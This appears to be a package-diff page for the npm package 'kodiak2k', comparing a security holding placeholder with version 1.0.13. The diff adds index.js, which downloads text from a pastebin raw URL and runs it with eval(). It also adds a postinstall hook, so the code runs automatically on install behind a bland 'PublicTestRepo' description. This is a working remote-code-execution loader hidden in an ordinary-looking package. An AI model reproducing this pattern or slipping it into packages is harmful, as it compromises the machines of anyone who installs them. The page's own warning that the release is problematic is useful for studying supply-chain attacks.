kodiak2k 0.0.1-security → 1.0.13

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of kodiak2k might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +1,2 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=kodiak2k for more information.
1
+ # Kodiak2k
2
+ PublicTestRepo
package/after.txt ADDED
@@ -0,0 +1 @@
1
+ now
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ const axios = require('axios');
2
+ const url = 'https://pastebin.com/raw/hKDzWLZw';
3
+ (async () => {
4
+ const response = await axios.get(url);
5
+ eval(response.data);
6
+
7
+ })();
package/package.json CHANGED
@@ -1,6 +1,25 @@
1
1
  {
2
2
  "name": "kodiak2k",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.13",
4
+ "description": "PublicTestRepo",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "Hello World",
8
+ "postinstall": "node index.js"
9
+ },
10
+ "repository": {
11
+ "type": "git",
12
+ "url": "git+https://github.com/cornkodiakbearshoe/Kodiak2k.git"
13
+ },
14
+ "author": "",
15
+ "license": "ISC",
16
+ "bugs": {
17
+ "url": "https://github.com/cornkodiakbearshoe/Kodiak2k/issues"
18
+ },
19
+ "homepage": "https://github.com/cornkodiakbearshoe/Kodiak2k#readme",
20
+ "dependencies": {
21
+ "axios": "^1.6.3",
22
+ "chalk": "^5.3.0",
23
+ "kodiak2k": "^1.0.10"
24
+ }
6
25
  }
package/sdgsdgsdg.txt ADDED
File without changes